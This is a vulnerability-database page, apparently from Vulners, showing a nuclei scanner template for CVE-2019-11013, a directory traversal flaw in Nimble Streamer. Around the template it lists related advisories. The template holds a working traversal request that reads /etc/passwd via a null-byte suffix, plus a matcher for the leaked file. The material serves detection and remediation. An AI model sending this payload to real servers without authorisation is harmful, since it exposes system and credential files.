Lucene search
K

Nimble Streamer <=3.5.4-9 - Local File Inclusion

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Nimble Streamer 3.5.4-9 Local File Inclusion vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal Vulnerability
23 Aug 201900:00
zdt
CVE
CVE-2019-11013
22 Aug 201914:41
cve
Cvelist
CVE-2019-11013
22 Aug 201914:41
cvelist
Exploit DB
Nimble Streamer 3.0.2-2 &lt; 3.5.4-9 - Directory Traversal
23 Aug 201900:00
exploitdb
exploitpack
Nimble Streamer 3.0.2-2 3.5.4-9 - Directory Traversal
23 Aug 201900:00
exploitpack
NVD
CVE-2019-11013
22 Aug 201915:15
nvd
OpenVAS
Nimble Streamer 3.0.2-2 <= 3.5.4-9 Directory Traversal Vulnerability
26 Aug 201900:00
openvas
OSV
CVE-2019-11013
22 Aug 201915:15
osv
Packet Storm
Nimble Streamer 3.x Directory Traversal
23 Aug 201900:00
packetstorm
Prion
Directory traversal
22 Aug 201915:15
prion
Rows per page
id: CVE-2019-11013

info:
  name: Nimble Streamer <=3.5.4-9 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further exploitation of the system.
  remediation: |
    Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47301
    - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/
    - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11013
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-11013
    cwe-id: CWE-22
    epss-score: 0.23978
    epss-percentile: 0.9756
    cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: softvelum
    product: nimble_streamer
  tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5d447504b8823b1b0a20f5ad84801da0a0ade6be15bfdca1bc82d54dc64393b02203999ba7ae7461cdf05704174f35433200879e89372145d2d2163b75f97b1feea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 24
CVSS 36.5
EPSS0.23978
21